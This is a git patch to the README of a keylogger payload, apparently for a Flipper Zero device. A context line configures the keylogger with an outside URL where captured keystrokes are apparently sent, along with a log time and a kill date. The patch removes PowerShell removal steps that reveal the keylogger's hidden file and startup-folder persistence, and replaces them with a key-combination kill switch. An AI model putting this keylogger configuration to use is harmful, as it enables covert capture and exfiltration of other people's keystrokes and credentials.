From 9d408292bac8a7a6cc442f802838348214eac7b5 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Mon, 26 Dec 2022 00:05:14 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-Keylogger/README.md | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/Payloads/Flip-Keylogger/README.md b/Payloads/Flip-Keylogger/README.md index aac91bd..ae106db 100644 --- a/Payloads/Flip-Keylogger/README.md +++ b/Payloads/Flip-Keylogger/README.md @@ -71,12 +71,7 @@ $dc='https://link.iamjakoby.com/xxxx';$log="09:00 pm";$ks="12/25/2022 10:00:00 P ``` ### DELETING THE KEYLOGGER -You can use the following code to delete the keylogger - -Or manually from those locations - -Remove-Item "$env:appdata\-locker" -Recurse -Force; -Remove-Item "$env:userprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\-p.cmd" +Just hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up

(back to top)